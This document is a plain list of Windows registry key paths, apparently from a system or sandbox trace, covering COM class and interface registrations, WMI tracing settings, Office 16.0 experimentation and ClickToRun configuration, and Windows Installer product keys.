HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocHandler
HKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\CIMOM
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\WBEM\CIMOM\EnableObjectValidation
HKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\Tracing\WMI
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\SessionEnabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\Level
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\AreaFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\Session
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\LogFile
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\BufferSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\MinimumBuffers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\MaximumBuffers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\MaximumFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\LogFileMode
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\FlushTimer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\AgeLimit
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{F309AD18-D86A-11D0-A075-00C04FB68820}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{F309AD18-D86A-11D0-A075-00C04FB68820}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{F309AD18-D86A-11D0-A075-00C04FB68820}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{D4781CD6-E5D3-44DF-AD94-930EFE48A887}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\cli
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\cli
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{9556DC99-828C-11CF-A37E-00AA003240C7}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\InprocHandler
HKEY_LOCAL_MACHINE\Software\Microsoft\OleAut
HKEY_LOCAL_MACHINE\system\Setup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\CIMV2
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\CIMV2
HKEY_CLASSES_ROOT\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InProcServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\(Default)
HKEY_CLASSES_ROOT\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\Synchronization
HKEY_CLASSES_ROOT\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\AppId
HKEY_CLASSES_ROOT\CLSID\{72970BEB-81F8-46d4-B220-D743F4E49C95}\InProcServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72970BEB-81F8-46D4-B220-D743F4E49C95}\InprocServer32\(Default)
HKEY_CLASSES_ROOT\CLSID\{72970BEB-81F8-46d4-B220-D743F4E49C95}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72970BEB-81F8-46D4-B220-D743F4E49C95}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72970BEB-81F8-46D4-B220-D743F4E49C95}\InprocServer32\Synchronization
HKEY_CLASSES_ROOT\CLSID\{72970BEB-81F8-46d4-B220-D743F4E49C95}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72970BEB-81F8-46D4-B220-D743F4E49C95}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72970BEB-81F8-46D4-B220-D743F4E49C95}\AppId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\SecuredHostProviders
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\SecuredHostProviders\ROOT\CIMV2:__Win32Provider.Name="MSVSS__PROVIDER"
HKEY_LOCAL_MACHINE\system\currentcontrolset\control\minint
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\Root
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\Root
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{B7B31DF9-D515-11D3-A11C-00105A1F515A}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{B7B31DF9-D515-11D3-A11C-00105A1F515A}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{B7B31DF9-D515-11D3-A11C-00105A1F515A}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{07435309-D440-41B7-83F3-EB82DB6C622F}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{07435309-D440-41B7-83F3-EB82DB6C622F}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{07435309-D440-41B7-83F3-EB82DB6C622F}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{21CD80A2-B305-4F37-9D4C-4534A8D9B568}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{21CD80A2-B305-4F37-9D4C-4534A8D9B568}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{21CD80A2-B305-4F37-9D4C-4534A8D9B568}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{06413D98-405C-4A5A-8D6F-19B8B7C6ACF7}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{06413D98-405C-4A5A-8D6F-19B8B7C6ACF7}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{06413D98-405C-4A5A-8D6F-19B8B7C6ACF7}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{027947E1-D731-11CE-A357-000000000001}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{027947E1-D731-11CE-A357-000000000001}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{027947E1-D731-11CE-A357-000000000001}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{1C1C45EE-4395-11D2-B60B-00104B703EFD}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{1C1C45EE-4395-11D2-B60B-00104B703EFD}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{1C1C45EE-4395-11D2-B60B-00104B703EFD}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{F50A28CF-5C9C-4F7E-9D80-E25E16E18C59}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{F50A28CF-5C9C-4F7E-9D80-E25E16E18C59}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{F50A28CF-5C9C-4F7E-9D80-E25E16E18C59}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6B3FC272-BF37-4968-933A-6DF9222A2607}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6B3FC272-BF37-4968-933A-6DF9222A2607}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{6B3FC272-BF37-4968-933A-6DF9222A2607}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0FC8C622-1728-4149-A57F-AD19D0970710}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0FC8C622-1728-4149-A57F-AD19D0970710}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{0FC8C622-1728-4149-A57F-AD19D0970710}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{FEC1B0AC-5808-4033-A915-C0185934581E}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{FEC1B0AC-5808-4033-A915-C0185934581E}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{FEC1B0AC-5808-4033-A915-C0185934581E}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{EB658B8A-7A64-4DDC-9B8D-A92610DB0206}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{EB658B8A-7A64-4DDC-9B8D-A92610DB0206}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{EB658B8A-7A64-4DDC-9B8D-A92610DB0206}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{7C857801-7381-11CF-884D-00AA004B2E24}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{7C857801-7381-11CF-884D-00AA004B2E24}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{7C857801-7381-11CF-884D-00AA004B2E24}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\InprocServer32\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{71285C44-1DC0-11D2-B5FB-00104B703EFD}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\Synchronization
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\AppId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\msasn1
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WaitToKillServiceTimeout
HKEY_LOCAL_MACHINE\Software\Microsoft\RestartManager
HKEY_CURRENT_USER\Software\Policies
HKEY_CURRENT_USER\Software\Microsoft\Office
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office
HKEY_LOCAL_MACHINE\Software\Microsoft\Office
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Office
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TrustCenter\Experimentation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentTas\officeclicktorun
HKEY_CURRENT_USER\Software\Microsoft\Office\Common
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\LabMachine
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentEcs
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentTas
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentEcs\CountryCode
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentTas\IsProviderIdFetchedFromLicensedName
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\officeclicktorun
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\officeclicktorun\Language
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common\ExperimentDogfood
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common\DevInstall
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\UpdateSupport\ExpiredBuild
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Configuration
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Configuration\AudienceId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\ProductReleaseIDs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\ProductReleaseIDs\ActiveConfiguration
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\ProductReleaseIDs\1769D00C-76B0-44E0-A548-8DB5C12F3A69\culture\x-none.16
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\ProductReleaseIDs\1769D00C-76B0-44E0-A548-8DB5C12F3A69\culture\x-none.16\StreamPackageUrl
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\AllowConsecutiveSlashesInUrlPathComponent
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common\Experiment
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentEcs\Overrides
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentEcs\officeclicktorun\Overrides
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentEcs\all\Overrides
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentEcs\officeclicktorun
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentTas\officeclicktorun\Flights
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentTas\officeclicktorun\ImpressionId
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\officeclicktorun\FlightNumberline
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TrustCenter\Experimentation\DisableExperimentation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\officeclicktorun\BuildNumber
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentEcs\PerpetualLicenseInfo
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TrustCenter\Experimentation\DisableFeatureRollout
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\BBAutomationAudience
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\officeclicktorun\AudienceImpersonatedInfo
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentEcs\officeclicktorun\Expires
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentEcs\officeclicktorun\ETag
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentEcs\officeclicktorun\Flights
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\Flight\officeclicktorun
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\officeclicktorun\FirstSessionTriggered
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1381398318-3211537236-2227685884-1000\Installer\Products\00006109F00000000100000000F01FEC
HKEY_USERS\S-1-5-21-1381398318-3211537236-2227685884-1000\Software\Microsoft\Installer\Products\00006109F00000000100000000F01FEC
HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\00006109F00000000100000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F00000000100000000F01FEC\InstallProperties
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-1381398318-3211537236-2227685884-1000\Components\3A6DB82315260CC45B5B5E1B523D5C13
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\3A6DB82315260CC45B5B5E1B523D5C13
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1381398318-3211537236-2227685884-1000\Installer\Products
HKEY_USERS\S-1-5-21-1381398318-3211537236-2227685884-1000\Software\Microsoft\Installer\Products
HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1381398318-3211537236-2227685884-1000\Installer\Products\00006109C80000000000000000F01FEC
HKEY_USERS\S-1-5-21-1381398318-3211537236-2227685884-1000\Software\Microsoft\Installer\Products\00006109C80000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\00006109C80000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109C80000000000000000F01FEC\InstallProperties
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109C80000000000000000F01FEC\InstallProperties\WindowsInstaller
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1381398318-3211537236-2227685884-1000\Installer\Products\00006109DD0000000100000000F01FEC
HKEY_USERS\S-1-5-21-1381398318-3211537236-2227685884-1000\Software\Microsoft\Installer\Products\00006109DD0000000100000000F01FEC
HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\00006109DD0000000100000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109DD0000000100000000F01FEC\InstallProperties
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109DD0000000100000000F01FEC\InstallProperties\WindowsInstaller
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1381398318-3211537236-2227685884-1000\Installer\Products\00006109F80000000100000000F01FEC
HKEY_USERS\S-1-5-21-1381398318-3211537236-2227685884-1000\Software\Microsoft\Installer\Products\00006109F80000000100000000F01FEC
HKEY_LOCAL_MACHINE\Software\Classes\Installer\Products\00006109F80000000100000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F80000000100000000F01FEC\InstallProperties
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F80000000100000000F01FEC\InstallProperties\WindowsInstaller
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\Common\FilesPaths
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages\en-US
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\PreferredEditingLanguage
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\PreviousPreferredEditingLanguage
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\UIFallbackSource
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\InstalledUICultures
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\UISnapshotLanguages
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\UIFallbackLanguages
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1381398318-3211537236-2227685884-1000\Installer\Components\1A705E72D3831594090DD020E37EFC1A
